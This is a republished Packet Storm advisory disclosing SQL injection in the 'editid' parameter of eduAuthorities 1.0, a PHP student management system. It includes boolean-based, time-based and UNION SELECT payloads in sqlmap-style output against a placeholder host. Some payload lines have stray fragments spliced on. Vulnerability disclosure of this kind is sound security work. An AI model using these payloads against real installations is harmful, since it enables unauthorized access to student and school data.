eduAuthorities 1.0 SQL Injection

eduAuthorities 1.0 SQL Injection
2024-8-6 21:41:57 Author: packetstormsecurity.com(查看原文) 阅读量:3 收藏

## Titles: eduAuthorities-1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 07/29/2024
## Vendor: https://www.mayurik.com/
## Software:
https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html
## Reference: https://portswigger.net/web-security/sql-injection## Description:
The editid parameter appears to be vulnerable to SQL injection attacks. The
payloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were each
submitted in the editid parameter. These two requests resulted in different
responses, indicating that the input is being incorporated into a SQL query
in an unsafe way. Note that automated difference-based tests for SQL
injection flaws can often be unreliable and are prone to false positive
results. You should manually review the reported requests and responses to
confirm whether a vulnerability is actually present.
Additionally, the payload (select*from(select(sleep(20)))a) was submitted
in the editid parameter. The application took 20011 milliseconds to respond
to the request, compared with 3 milliseconds for the original request,
indicating that the injected SQL command caused a time delay.The attacker
can get all information from the system by using this vulnerability!
STATUS: HIGH- Vulnerability
[+]Exploits:
- SQLi Multiple:
```mysql
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)
    Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488
OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)#
UiVZfrom(select(sleep(3)))a)
    Type: UNION query
    Title: MySQL UNION query (random number) - 3 columns
    Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962
UNION ALL SELECT
8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a)
---
```
## Reproduce:
[href](https://www.patreon.com/posts/eduauthorities-1-109562178)
## More:
[href](
https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html)
## Time spent:
00:37:00

文章来源: https://packetstormsecurity.com/files/179919/eduauthorities10-sql.txt
如有侵权请联系:admin#unsafe.sh